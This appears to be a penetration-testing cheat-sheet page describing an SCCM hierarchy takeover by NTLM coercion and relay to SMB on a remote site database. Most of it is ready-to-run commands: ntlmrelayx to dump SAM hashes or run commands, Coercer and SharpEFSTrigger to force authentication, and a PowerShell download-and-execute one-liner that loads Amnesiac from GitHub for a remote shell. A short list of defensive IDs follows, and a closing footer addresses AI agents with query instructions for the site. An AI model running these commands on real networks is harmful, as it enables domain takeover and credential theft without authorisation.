# TAKEOVER-2 ## Document Reference * [TAKEOVER-2](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/attack-techniques/TAKEOVER/TAKEOVER-2/takeover-2_description.md) ## Description Hierarchy takeover via NTLM coercion and relay to SMB on remote site database ## Requirements * PKI certificates are not required for client authentication (default) * SCCM database server hosted on a system that is independent of the main site server * SMB is reachable and SMB signing isn’t required on the site database server * Local Administrator if performing the attack from Windows (due to SMB port redirect) ## Tools Required * divertTCPConn: * Coercion Tools: * ntlmrelayx: ## Windows Divert SMB on port 445 to port 8445 (Requires Local Administrator) ``` divertTCPconn.exe 445 8445 ``` Set up ntlmrelayx to the alternate SMB port and to point at the MSSQL database server ``` # Dump SAM ntlmrelayx.exe --smb-port 8445 -smb2support -t # Execute Commands ntlmrelayx.exe --smb-port 8445 -smb2support -t 192.168.60.12 -c "[Command]" ``` Perform the coercerian with SharpEFSTrigger to relay the SCCM Site Server computer account to the MSSQL database server. {% code overflow="wrap" %} ```powershell # Option 2: SharpEFSTrigger SharpEFSTrigger.exe EfsRpcDecryptFileSrv # Option 1: Coercer Coercer.exe coerce -u [Username] -p "[Password]" -d [Domain] -t [Site Server IP] -l [Listener IP] --auth-type smb --filter-method-name EfsRpcDecryptFileSrv ``` {% endcode %}

### Getting a full shell on Windows with Amnesiac * Amnesiac: Load Amnesiac through PowerShell

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Leo4j/Amnesiac/main/Amnesiac.ps1');Amnesiac

Generate a global listener payload with option \[2]

Use the payload within ntlmrelayx to be executed on the target system. ```powershell # Setup with ntlmrelayx ntlmrelayx.exe -t 192.168.60.12 -smb2support --smb-port 8445 -c "[PAYLOAD]" ``` Once we trigger coercion again, ntlmrelayx will execute the powershell payload on the target system. Once this is done, use option \[3] on Amnesiac to connect.

### Defensive IDs * [DETECT-1: Monitor site server domain computer accounts authenticating from another source](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/DETECT/DETECT-1/detect-1_description.md) * [PREVENT-12: Require SMB signing on site systems](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/PREVENT/PREVENT-12/prevent-12_description.md) * [PREVENT-20: Block unnecessary connections to site systems](https://github.com/subat0mik/Misconfiguration-Manager/blob/main/defense-techniques/PREVENT/PREVENT-20/prevent-20_description.md) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/sccm-mecm/takeover-2.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.